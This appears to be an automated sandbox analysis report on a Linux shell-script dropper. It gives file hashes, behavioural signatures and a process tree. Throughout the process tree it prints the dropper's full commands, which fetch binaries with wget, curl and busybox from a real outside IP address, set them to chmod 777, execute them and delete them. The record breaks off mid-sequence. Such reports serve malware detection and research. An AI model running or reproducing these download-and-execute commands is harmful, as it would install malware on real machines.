Analysis
-
max time kernel
95s -
max time network
97s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21/10/2024, 01:28
Static task
static1
Behavioral task
behavioral1
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
-
Size
10KB
-
MD5
ba972d8a71d4f6e168a2e85fed85abb5
-
SHA1
d5a1c90cb3a5c93711516ffd0a1b453f2dab2d34
-
SHA256
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478
-
SHA512
9fedd59c9f5bba18e74051cda67828dcb72dd743e458801140e60e8820799de56e08cace0c1124ed1a4904a107367fea85941e62b1809200b6e7649abc0d43fb
-
SSDEEP
192:cyCVKOtLWhe6/TSK9QQx0YDcUO1NDc9Be6/TSKrQQx0EyCVKOb:iLWtVQQx0YDcUUNDc/DQQx0U
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 962 chmod 866 chmod 872 chmod 920 chmod 950 chmod 902 chmod 956 chmod 968 chmod 860 chmod 932 chmod 938 chmod 944 chmod 777 chmod 803 chmod 817 chmod 896 chmod 914 chmod 926 chmod 754 chmod 854 chmod 878 chmod 908 chmod 890 chmod 974 chmod 734 chmod 797 chmod 842 chmod 884 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt 735 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw 756 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ 779 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q 798 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG 804 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK 818 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW 843 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq 855 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh 861 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 867 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P 873 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT 879 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR 885 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t 891 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW 897 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq 903 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh 909 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 915 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P 921 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT 927 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR 933 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t 939 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG 945 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK 951 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt 957 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw 963 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ 969 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q 975 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 802 busybox 941 wget 942 curl 946 rm 943 busybox 945 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG 800 wget 801 curl 804 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG 805 rm -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P curl File opened for modification /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t curl File opened for modification /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt curl File opened for modification /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK curl File opened for modification /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT curl File opened for modification /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh curl File opened for modification /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P curl File opened for modification /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ curl File opened for modification /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw curl File opened for modification /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK curl File opened for modification /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq curl File opened for modification /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t curl File opened for modification /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq curl File opened for modification /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT curl File opened for modification /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR curl File opened for modification /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG curl File opened for modification /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt curl File opened for modification /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q curl File opened for modification /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR curl File opened for modification /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw curl File opened for modification /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q curl File opened for modification /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW curl File opened for modification /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG curl File opened for modification /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh curl File opened for modification /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 curl File opened for modification /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW curl File opened for modification /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 curl File opened for modification /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ curl
Processes
-
/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:706
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:711
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:718
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:730
-
-
/bin/chmodchmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:736
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:737
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:752
-
-
/bin/chmodchmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:759
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:761
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:766
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:773
-
-
/bin/chmodchmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:781
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:783
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:790
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:796
-
-
/bin/chmodchmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:799
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:800
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:802
-
-
/bin/chmodchmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:804
-
-
/bin/rmrm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:805
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:806
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:807
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:814
-
-
/bin/chmodchmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:822
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:839
-
-
/bin/chmodchmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:848
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:851
-
-
/bin/chmodchmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:856
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:857
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:859
-
-
/bin/chmodchmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:862
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:863
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:865
-
-
/bin/chmodchmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:868
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:869
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:871
-
-
/bin/chmodchmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:877
-
-
/bin/chmodchmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:880
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:883
-
-
/bin/chmodchmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:889
-
-
/bin/chmodchmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:895
-
-
/bin/chmodchmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:901
-
-
/bin/chmodchmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:907
-
-
/bin/chmodchmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:913
-
-
/bin/chmodchmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:919
-
-
/bin/chmodchmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:925
-
-
/bin/chmodchmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:929
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:931
-
-
